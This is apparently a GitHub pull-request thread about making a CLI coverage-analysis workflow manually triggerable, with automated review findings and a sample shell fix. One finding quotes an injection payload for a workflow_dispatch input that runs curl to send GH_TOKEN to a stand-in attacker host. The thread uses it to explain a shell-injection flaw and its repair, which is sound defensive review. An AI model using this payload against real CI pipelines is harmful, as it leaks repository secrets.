Conversation
The previous prompt only checked recent commits and vaguely asked to identify coverage gaps. This update makes the prompt explicit about:

1. Reading api.md as the authoritative source of ALL SDK methods
2. Reading param structs from Go files to enumerate ALL options/fields
3. Building an SDK coverage matrix (methods + params)
4. Building a CLI coverage matrix (commands + flags)
5. Performing gap analysis to find missing commands and flags
6. Mapping guidance for SDK param fields to CLI flags (CamelCase -> kebab-case)

This ensures the agent does a complete enumeration rather than just checking what changed in the most recent commit.

Co-authored-by: mason <[email protected]>
The workflow can now be triggered manually via workflow_dispatch with:

- An optional pr_number input to specify a specific PR
- If pr_number is not provided, uses the most recent merged PR
- Falls back to HEAD if no PR is found

This allows re-running the CLI coverage analysis for past PRs or triggering it manually without requiring a new push to main.

Co-authored-by: mason <[email protected]>
Cursor Bugbot has reviewed your changes and found 2 potential issues.
```yaml
      run: |
        if [ -n "${{ inputs.pr_number }}" ]; then
          # Use provided PR number
          PR_NUMBER="${{ inputs.pr_number }}"
```
Shell injection via untrusted workflow dispatch input
Medium Severity
The `inputs.pr_number` value is directly interpolated into the shell script using `${{ inputs.pr_number }}`. GitHub Actions performs string substitution before the shell parses the script, so a malicious input like `"; curl attacker.com?t=$GH_TOKEN #` would break out of the string context and execute arbitrary commands. This could exfiltrate the `GH_TOKEN` secret which is available in the step's environment. The safe pattern is to pass the input through an environment variable first (e.g., `env: PR_INPUT: ${{ inputs.pr_number }}` then use `"$PR_INPUT"` in the script).
```sh
          echo "Using most recent merged PR: $PR_NUMBER"
        fi

        if [ -z "$PR_NUMBER" ]; then
```
Empty array returns "null" string, not empty
Low Severity
When no merged PRs exist, `gh pr list` returns an empty array `[]`. The jq expression `.[0].number` on an empty array returns `null`, which becomes the literal string `"null"` with raw output. The subsequent check `if [ -z "$PR_NUMBER" ]` tests for empty string, but `"null"` is not empty. This causes the script to incorrectly proceed to `gh pr view "null"`, which fails. The jq expression needs `// empty` (like `'.[0].number // empty'`) to output an empty string instead of `"null"`.
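Both Bugbot findings above concern the same PR-number selection step, so here is that logic as an added shell example (not the repository's workflow and not Bugbot's code) with both fixes applied: the dispatch input reaches the shell only through an environment variable, `PR_INPUT`, which the step's YAML would set with `env: PR_INPUT: ${{ inputs.pr_number }}`, and it is additionally rejected unless it is a plain decimal number; the `gh pr list` fallback uses `// empty`, so an empty list yields an empty string rather than `"null"`. The function name `resolve_pr_number`, the JSON samples, and the replacement of the `gh` call by a function parameter are assumptions made so the script runs offline.

```shell
#!/usr/bin/env sh
# Added example, not the project's workflow. Models the "determine PR number"
# step with the two review findings fixed:
#   1. the workflow_dispatch input is read from the environment (PR_INPUT),
#      which the YAML step would populate via
#        env:
#          PR_INPUT: ${{ inputs.pr_number }}
#      and is never interpolated into the script text;
#   2. the jq fallback prints an empty string, not "null", for an empty list.
# The `gh pr list` call is replaced by a function parameter (assumption) so the
# logic can be exercised against constructed JSON without network access.

# Print the PR number to analyse, or nothing when none is known.
# $1: JSON that `gh pr list --state merged --json number` would print.
# Returns 1 if PR_INPUT is set but is not a plain decimal number.
resolve_pr_number() {
    pr_list_json="$1"
    if [ -n "${PR_INPUT:-}" ]; then
        # Defence in depth on top of the env-var pattern: accept only digits,
        # so the value is safe to hand to gh as a positional argument.
        case "$PR_INPUT" in
            *[!0-9]*)
                echo "pr_number input is not numeric: $PR_INPUT" >&2
                return 1
                ;;
            *)
                printf '%s\n' "$PR_INPUT"
                return 0
                ;;
        esac
    fi
    # '// empty' makes jq emit nothing for [] instead of the literal null,
    # so the caller's -z check behaves as intended.
    printf '%s' "$pr_list_json" | jq -r '.[0].number // empty'
}

# Constructed samples standing in for gh output.
SAMPLE_WITH_PR='[{"number": 42}, {"number": 41}]'
SAMPLE_EMPTY='[]'

# Stand-alone demo with PR_INPUT unset, as on a push-triggered run.
unset PR_INPUT
if command -v jq >/dev/null 2>&1; then
    for sample in "$SAMPLE_EMPTY" "$SAMPLE_WITH_PR"; do
        PR_NUMBER=$(resolve_pr_number "$sample")
        if [ -z "$PR_NUMBER" ]; then
            echo "No merged PR found; falling back to HEAD"
        else
            echo "Using most recent merged PR: $PR_NUMBER"
        fi
    done
fi
```

In the real workflow the `gh` invocation would replace the JSON parameter, but the shape stays the same: the untrusted input is only ever a variable value, never script text, and the empty-list case reaches the `-z` check as a genuinely empty string.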
Enhance the CLI coverage workflow prompt to enforce full SDK method and CLI command enumeration for comprehensive gap analysis.
Note

Strengthens the CLI coverage updater workflow and makes it manually runnable with PR context.

- `workflow_dispatch` with optional `pr_number`; fetches PR metadata (merge SHA, author, title) via `gh` and checks out the merge commit when provided
- version; derives author from PR or push event
- `api.md` + Go param structs) and CLI commands, building matrices and performing gap analysis (missing commands/flags)

Written by Cursor Bugbot for commit b3020ea.